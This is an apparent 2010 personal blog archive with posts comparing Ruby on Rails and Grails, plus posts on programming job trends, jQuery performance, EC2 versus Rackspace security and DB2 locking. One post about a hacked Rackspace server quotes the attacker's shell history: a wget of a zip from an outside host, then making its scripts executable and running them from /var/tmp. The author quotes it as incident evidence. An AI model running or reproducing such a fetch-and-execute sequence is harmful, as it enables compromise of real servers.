Wednesday, October 27, 2010

Rails and grails package management

Next on my agenda for comparing these two frameworks is package (aka dependency management). Up until the release of Rails3, I would say grails was the hand's down clear cut winner in this regard. Grails was engineered from VERY early on with the idea of dependency management being core to the framework. IMHO, this further illustrates how grails advanced the state of the art by sanding off some of the rough edges off of rails. If I were in charge of an IT department, I still think grails has a bit of an edge from a management perspective, but it does lose out a little in the flexibility department.

Ruby (via the gem mechnism) still suffers greatly from "gem hell" problems. Rails3 takes a step in the right direction by making bundler a core part of how applications are configured. Grails, on the other hand, is moving toward using maven as it's standard dependency management solution. In addition, grails has supported this for a number of years now and it works pretty well.

Where grails and maven suffer is that they are VERY opinionated. Unless you embed a jar directly in your project, it is very difficult to deviate from the "maven" way of packaging things. This means that building off a dev/snapshot package can be problematic (especially if you need to switch repositories often). Rails/Bundler on the other hand, while still pretty opinionated, let's you pick the method you want to pull your dependencies in. You can pull individual gems from git, some stuff from github, some stuff off your local machine. By embracing the culture of "everyone pitch in" they are offering the most flexible possible solution.

On the other hand, asking 3 people how to properly include a library in a rails project will likely net you 4-5 different answers. Grails, by contrast, will likely only get 2 answers...

Which of these two methods is better is left to you... I prefer the flexible approach of rails when developing software, but the more controlled mechanism of grails when maintaining software and infrastructure.

Tuesday, October 26, 2010

Rails and grails job scheduling

In my continuing comparison of ruby on rails to groovy and grails I've discovered another big difference. Grails has excellent support for job scheduling, whereas the existing rails plugins are confusingly complicated.

In grails, to set up a job, install the quartz plugin

grails install-plugin quartz
grails create-job MyJob

and edit the new class called MyJob

class MyJob {
static triggers = {
simple name: 'mySimpleTrigger', startDelay: 60000, repeatInterval: 1000
}

def group = "MyGroup"

def execute(){ print "Job run!" } }


Done, you now have a job running inside your application running at a repeating interval. The pluging supports cron-like syntax as well as custom triggers.

Rails, on the other had (much like perl ;) has more than one way to do it. The biggest thing I notice is that most of the rails plugins either #1 require you to schedule a unix cron job example or #2 require you to run another ruby process to do the scheduling example. The fundamental difference is that the "ruby way" is to create a new process manually instead of forking a process or new thread in the initialization of your application (like the java/grails way).

Some other ways to do it from the rails wiki.

In short, background job scheduling is something that grails took a completely different approach with. By leveraging the quartz library and embracing all the multithreaded goodness that is a modern J2EE container, grails makes a compelling case for "this is the way you do it". Rails, on the other hand, for all it's "convention over configuration" talk, has a rats nest of confusing methods to accomplish a fairly routine and simple task.

The fundamental problem with this sort of activity in rails is that the underlying architecture isn't designed around the concept of a long running processes that service multiple simultaneous activities. In my head, this is a pretty important consideration when you start thinking about managing more than a simple CRUD application. The rails way is to essentially ignore this and let folks run amok building random plugins. The grails way is to treat this as a fundamental (though optional) part of building web applications.

Monday, October 25, 2010

Technology and programming trends

As technologist, I'm always keeping my eyes on the market. There's nothing worse from a marketability perspective than being the best chariot wheel repairman when the entire world has moved on to automobiles. If you're going to be in a niche, you better be in one that is HIGHLY lucrative.

To this end, I took a look on indeed.com and tried to see how various programming languages stacked up as far as job postings.


Obviously this is not comprehensive, but it shows what I "kinda" already knew. C is king, with java taking a large secondary position and C# following up behind java. One thing to note is that that largest percentage shown on that chart is 4%. This roughly means that the market is SO fragmented that a large leader only captures 4%. For the COBOL folks clinging on for dear life... Hopefully you're near retirement age because right now finding a COBOL job is going to be pretty difficult.

Now for a more interesting perspective. Let's rescale everything relative to what it's position was a few years ago and plot the numbers are percentage growth.


Whoa! This paints an interesting picture. We see that a few new upstarts (erlang, ruby, and groovy) are taking off. Furthermore, we see that of those 3, ruby actually scores higher in absolute market than a lot of established players.

These charts, however only show a part of the picture. Right now, mobile, social media, and cloud technologies are just as important skills as purely using a particular programming language. In fact, the value of twitter (for exmample) is not really from the languages used (scala, ruby), but for the social effect gained by using the technology.

For the next group, I eliminated C just because it was so much higher than everything else, but also because a lot of C positions are for things that aren't really trending upward. So now let's look at a few "hot" technologies scored against some programming languages.


We can see that while the mobile/cloud/social space seems to not have broken too far into the market yet. However, when we look at growth.


We see that twitter (holy smokes) facebook, and iPhone are all growing exponentially upward. Now part of this is because they haven't been around very long, but if you take away the leaders and REALLY look at the numbers.

We can see that, while the market is still relatively small, it is fairly large .6% (or roughly 1/6th that of the leader... C) and that coupled with large growth indicates to me that it might be a good place to be. Note, I added sharepoint to the second slide because I keep seeing postings for it and it DOES seem to have a nice position... It's growth, however is linear, and I'm more interested in the rate of increase of the growth for the time being.

I realize this isn't a highly scientific study and there are a ton of holes in the analysis, but the point is that things are starting to break free of the traditional "I'm a java guy" perspective and trending toward technologies that require integration. In addition, showing how small a market the leading language has, there is a compelling case to be made for being a polyglot.

Thursday, October 21, 2010

Hacked Server on Rackspace

Last month, I had a cloud server exploited and couldn't figure out how it happened. After a little investigation, I've got a good news bad news situation. The good news is that I DID manage to contact someone at rackspace who could help me out and they re-enabled my account.

The bad news is that the server wasn't pretty. On the upside it must have been hacked by a script kiddie as they did NOT cover their tracks very well at all. On the downside, they did NOT appear to have used the single user account I created and somehow entered through either the rackspace admin network (SPOOKY, inside job?) or one of the default services installed with Ubuntu 10.04 LTS (still not good)

From my root .bash_history, I noticed the following (the first few lines, may have been me):
exit w                                                                                                                     
w                                                                                                                      
passwd                                                                                                                  
cd /var/tmp                                                                                                             
la                                                                                                                      
wget hacker.go.ro/go.zip                                                                                                
unzip go.zip                                                                                                            
cd go                                                                                                                   
chmod +x *                                                                                                              
./go.sh 112                                                                                                             
cd /var/tmp                                                                                                             
cd go                                                                                                                 
chmod +x *                                                                                                            
./go.sh 220       

In my /var/tmp/go directory I have a bunch of stuff that I'm looking at right now, but of specific interest are a couple of Chinese servers that appear to have been used in the heist.

In short, Rackspace did a good job during "normal business" hours of helping me out, but I certainly ran into a few pretty serious drawbacks. Notably:

#1 By default, servers are built and exposed to the internet immediately.
#2 There is no mechanism to set up mini DMZs or other ways to cordon off traffic, except through software controls (on servers that are already potentially p0wn3d).
#3 There is no weekend support as far as I can tell.

A big plus to having the server physically sitting on site is that, unless you get locked out of the server room, you can ALMOST always reboot the server from a CD and reinstall the OS. If your hosting provider decides to disable your cloud network console, you're kinda out of luck.

Overloaded terms in the Ruby community

I've been refactoring some tests and changed them from using a global set of users/roles defined as fixtures to instead be factories.

OK, for java folks I'm going to give you the secret ruby decoder ring.

Fixtures = predefined data that you create by manually seeding via seed.rb
Factories = data generated via a factory method at runtime

It's interesting that the ruby community has decided to overload the meaning of these terms to be very specific. I say this because in the "rest of the world" when dealing with testing, a test fixture is a much more generic concept. Typically it is the thing that sets up the test and tears down the test. Yes, often it creates data, but that is not necessarily it's job.

Factories = This is a term that alludes to a well known and fundamental design pattern that can be used for a million different things and honestly has fallen out of vogue with java folks in favor of using dependency injection instead. It seems many folks think that using a factory to generate data for a test case has some inherent advantage over using pre-seeded global data (or other patterns). The primary advantage stated is that it moves the generation of the data closer to the thing being tested.

This is a very good reason, but it doesn't actually eliminate fixtures (generally speaking), it simply moves the fixture from a global scope into a more specific scope. The obvious downside to this is that for things that recur in multiple scopes, you are now repeating yourself.

Wednesday, October 20, 2010

Ruby on rails and groovy grails comparison

As a person who has had the luxury to work in both ruby on rails and groovy grails, I've found a few differences that make their approach quite a bit different.

#1 Groovy allows you to write java. While this isn't a huge deal, it can be both a positive and a negative. I've worked on teams where folks treat grails as a super simple java framework and never leverage any of groovy's dynamic goodness. While this isn't a huge problem, it does delay (or eliminate) to transition from J2EE xml configuration file hell into a more dynamic way of coding.

#2 Ruby forces you to learn "the ruby way". For folks who are only used to java, seeing ruby code is like...seeing another language. Because of this, the idioms used in java are more quickly forgotten and you more quickly become a ruby native because you MUST. Only having worked with a few other people while they moved from java to ruby, I can only speak from my personal experience. I can say that ruby's syntax is not THAT much different as long as you keep an open mind, and I found I was able to more quickly learn the "ruby way" than I was able to learn the "groovy way" simply because I was FORCED to do it with ruby.

#3 Rails uses db migrations by default. This is a huge plus for db CRUD applications. It enables you to make sure you have a migration path from version to version of your code. Grails, on the other hand doesn't come with anything (by default) to handle this.

#4 Rails has a sparse model class definition. Should you NOT decide to use db migrations, you can simply create some tables in your database, create an empty ruby class, and begin using it. You don't need a class definition that matches the db table, because the fields are put on the class via introspection of the table. This then frees you to only implement business functionality on your model.

#5 Grails integrates seamlessly with most modern J2EE environments. Newer versions of spring allow you to code groovy code INSIDE your spring configuration xml. Grails creates a war file that can be deployed with little or no modification directly into a J2EE container. Rails CAN be integrated in a similar fashion, but it is really a kind of frankenstein implementation to get JRuby on rails via a J2EE container.

#6 Ruby on rails is MUCH more nimble and dynamic for building functionality. Grails enables taglibs and meta-programming, but many of the DSLs quickly get cluttered with java-like confusion that doesn't really have any business advantage. In addition, because of the way grails works with classloading in servlet containers, it is constantly restarting the container to pick up new functionality. With rails, I can reinitialize the database, drop/create tables, completely redesign the application, and it will typically continue to run without a hitch. I've often gone an entire day add/removing domain classes, changing controllers, rebuilding tag libraries and my rails engine never has to be restarted.

#7 The groovy and grails community is more organized. That having been said, they're both pretty disorganized and certainly the "herd of cat's" syndrome is running rampant in both of them. However, when I google "groovy roadmap", my first hit is this http://groovy.codehaus.org/Roadmap, "ruby roadmap" gets me: http://redmine.ruby-lang.org/projects/ruby-19/roadmap. You choose which one seems more organized.

#8 The ruby community is larger. While still pretty small compared to the likes of PHP or java, you cannot throw a stick and help but hit someone who has at least heard of ruby on rails. Groovy/Grails is still pretty small. On the other hand, I would point out that the grails community is growing where the rails community growth seems to have leveled off in the last year or so.

In conclusion, there are a lot of other factors that make selection of one or the other of these better or worse. If I where to learn only one of these and had no prior experience, I would probably learn ruby and rails just because of the size of the community. If I were a java person, I would likely start with groovy/grails just because the learning curve is going to be less steep.

Friday, October 8, 2010

jQuery ajax performance tuning

Modern web applications are all about user experience and a major factor in this is performance. A user interface that is laggy or gives the appearance of slowness will drive users away as quickly, if not more quickly, than an ugly and unintuitive one.

This having been said, sometimes there are things that are just plain slow. Answering questions like "calculate the price for all 2 million products we sell in the north american market and present the top 10 with at least 50 in stock at a Distribution center within 50 miles" can often take some time. Couple these complex business rules with rich and powerful user interfaces and you have a potential for slowness to silently creep into your application. Digging through a few of the more modern javascript libraries, there are a number of strategies to combat this. We'll use the jquery datatable to illustrate some simple speedups that might apply.

For our situation, let's pretend the above mentioned query takes 500ms and the time to actually render the html for the rest of the page takes 500ms (until document ready). There are three general ways to get your front-end widget to initialize. In the interest of simplifying things, we're going to assume outside factors (like network congestion, server availability, etc) are not influencing our decision.

method 1 - put the data in the html/dom

This is often the simplest way an has the added benefit of often degrading when a user is has a browser that doesn't have javascript enabled. The down side is that the trivial implementation will generally require the aggregate of the two times in order to complete (read 1 second)

method 2 - put the data as an ajason request (not ajax, because who uses xml on the web any more?)

This has the benefit of enabling the server to send back the core html (500ms) and THEN fetch the rest of the page. This means the user has SOME content in 500ms, and instead of staring at nothing (or the old page) for 1 second, they see SOMETHING in 500ms. This has the downside of actually requiring the same amount of time (if not more) than the above method. The biggest benefit is that is CAN make the system seem more responsive.

method 3 - put the data as a javascript include

OK, this one is a little whacky, but can make things even faster than either of the two above. In this method, instead of wiring the data into an xmlhttp request that is fetched after the DOM is loaded, you put a link in the document (probably the head) that points to a dynamically generated javascript file that will wire the content into the dom as soon as the required parent element shows up. This has the advantage of allowing the fetch of the data to proceed BEFORE the dom has fully loaded. In practice, this starts to become more performant when you have larger documents with complicated controls and markup in them.

I don't necessarily recommend this approach as a defacto starting point. Before going down this path, you should make sure you've done the following:
  • minify and consolidate all your css and js
  • consolidate and pack all your images
  • use a cdn or edge server for static assets and content
  • properly set cache-control headers and usie etags where appropriate

Don't start with this approach, but it is certainly a way to squeeze a little more performance out of your user interface.

Wednesday, October 6, 2010

Amazon EC2 versus rackspace cloud hosting

I recently needed to stand up a DB2 server and was going to reach for my trusty rackspace account, but didn't feel like setting up DB2 for an experiment that would only last a few hours.

Instead I turned to amazon. It turns out that amazon has preconfigured images for ubuntu/db2 that you can spin up almost instantaneously. In addition, their security model is a little more robust. Key things they do right from a security perspective (compared to rackspace).

#1 They never send you a root password (via email or otherwise). You must generate a public/private key pair and download the key via https. Assuming you keep your secret key secure, there is minimal (if any) opportunity for someone to steal this key. Even if they hack your amazon account, I'm not sure they could get to your server immediately, even though they certainly could shut it down.

#2 By default you are behind a firewall so that only a minimal set of tcp ports are even open. You need to actually take action before they will allow ssh access to the server.

#3 The root account is locked and cannot log in from a remote location. You MUST log in via a "normal" user (ubuntu on this image) and then switch to root.

All told, it seems like EC2 has got a more secure default setup than Rackspace. I haven't yet compared pricing or service levels on the two, but purely from a security perspective, RackspaceAWS certainly has got it's stuff together.

Monday, October 4, 2010

db2 locking and MVCC

I had an interesting discussion about locking in db2 a while back. It was interesting because it challenged some long held assumptions I had about db2 and how it handles locking. As usual, when I started digging deeper it turns out it is much more complicated that it would seem on the surface.

First off, some background: I was having a conversation with a colleague about locking in various DBMS's and I made the statement that DB2 doesn't support MVCC. Thus, I contended, it is not possible for someone to read the previous version of a row that I have updated while I'm in a transaction that has altered it. At this point the fellow I was talking to looked at me as if I had just grown an arm out of my forehead. He stated (correctly, it turns out) that DB2 has supported this almost forever.

I was, however, VERY confident that I was correct and subsequently dug up the documentation. Oddly enough, the documentation seemed to support the notion that I was mistaken (gasp!). Well, at this point I HAD to get to the bottom of this.

So, I fired up an amazon ec2 instance with ubuntu and db2 9 udb and started my test.

First, I created a table
create tablespace test1
create table test (id integer)
keep forgetting that the more confident I am that I'm 100% correct,


Then fired up squirrel sql with two different connections turning off autocommit.
First I seeded some data:
insert into test values (1)
insert into test values (2)
commit
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
select * from test where id = 1

When I issued the second select, in my head, I should have blocked for the first insert to finish,but it came back immediately. So now I had to sit back and wonder: "Am I imagining this behavior?" When I stop to think about it, my position seems suspect not matter how you slice it.

So I reread the definitions of db2's lock levels http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ as well as some ways things can go haywire http://www.ibm.com/developerworks/data/library/techarticle/dm-0509schuetz/ and got thinking back to the situation that caused me to think this.

The key thing that I was missing is that this ONLY applies to readers, if I change the second statement to an update, it WILL block (by default). So for example, if we run THIS sequence:
On connection 1 I entered
update test set id = 12 where id = 2
and on connection two I entered
update test set id = 100 where id = 2

The second update will wait for the first one to finish. By comparison, in an MVCC database, the second one can continue to operate with the version of the row as it was when its transaction began. This is they key thing that kept confusing me. DB2 treats readers and writers as unequal partners in the database instead of putting them on equal ground. While readers typically don't block, it's the writers that will cause problems.

In honesty, it sounds like there IS a setting in newer versions of db2 to enable MVCC-like behavior, but is NOT the default. In addition, there is certainly overhead to maintaining versions of data just to keep writers running concurrently. Certainly for read intensive operations, it might not be worth the overhead.

For a nice article, take a peek here: http://www.rtcmagazine.com/articles/view/101612

Mike.

Saturday, October 2, 2010

HTTP 1.1, rfc 2616 and reading comprehension

I've read with interest some documentation from Microsoft about how the HTTP 1.1 specification mandates some behavior. To Quote:
WinInet limits connections to a single HTTP 1.0 server to four simultaneous connections. Connections to a single HTTP 1.1 server are limited to two simultaneous connections. The HTTP 1.1 specification (RFC2616) mandates the two-connection limit.

This seems to be saying that browsers are only allowed (via some mythical mandate) to use two connections per server and any connections past two must block. After reading through the http 1.1 specification (again) I'm troubled that many folks have seriously misinterpreted this requirement. This is especially troubling because the manner in which RFCs are written is VERY explicit and it is (for me) really easy to understand the difference between a requirement and a recommendation. What is even more troubling is that people quote the microsoft reinterpretation of the specification as if it is a direct quote of the specification.

So for my example, the top of RFC 2616 states:
The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in RFC 2119 [34].

If we chase down RFC 2119

1. MUST This word, or the terms "REQUIRED" or "SHALL", mean that the
definition is an absolute requirement of the specification.

2. MUST NOT This phrase, or the phrase "SHALL NOT", mean that the
definition is an absolute prohibition of the specification.

3. SHOULD This word, or the adjective "RECOMMENDED", mean that there
may exist valid reasons in particular circumstances to ignore a
particular item, but the full implications must be understood and
carefully weighed before choosing a different course.

4. SHOULD NOT This phrase, or the phrase "NOT RECOMMENDED" mean that
there may exist valid reasons in particular circumstances when the
particular behavior is acceptable or even useful, but the full
implications should be understood and the case carefully weighed
before implementing any behavior described with this label.

Then in the http spec we see:
Clients that use persistent connections SHOULD limit the number of simultaneous connections that they maintain to a given server. A single-user client SHOULD NOT maintain more than 2 connections with any server or proxy. A proxy SHOULD use up to 2*N connections to another server or proxy, where N is the number of simultaneously active users. These guidelines are intended to improve HTTP response times and avoid congestion.


Whats my problem?
  • If someone has taken the time to formally define things in a certain context, it is professionally irresponsible to change the meaning of their statements.
  • If you are distributing technical documentation, make sure you have your facts right and use unambiguous language. Remember, not everyone speaks English as their native language, nor do they necessarily have the inclination to go chase down quoted sources.
  • If you are trying to cite documentation, chase down the originator, don't rely on second, third, fourth, or nth parties to give you your information unless you REALLY trust them

Lets dissect a portion of the original quote:

Connections to a single HTTP 1.1 server are limited to two simultaneous connections.

Which of the following statements does this concretely assert?
  • An HTTP server will not accept more than two simultaneous connections.
  • An HTTP server might accept only two connections or might accept more
  • Clients can not make more than two simultaneous connections to the same server
  • Clients can actually make more than two simultaneous connections, but we've limited them to two

For the lay person (other than perhaps lawyers), these distinctions probably seem like minute and petty semantic wrangling. For professional software developers they are, however, terribly important.

Why? Because computers don't exactly do what you want them to do, they do exactly what you tell them to do.

Reread that a couple of times please...

Any subjective interpretation you are expecting the computer to do on your behalf does NOT happen and anybody who's used a computer has probably run into problems where the computer is not doing what you want and you are unable to understand why. There are millions of lines of code you are interacting with and their behavior is often specified with ambiguous language like the original paragraph. More importantly, they are restated and modified via the "telephone game" effect such that original and same requirements are completely lost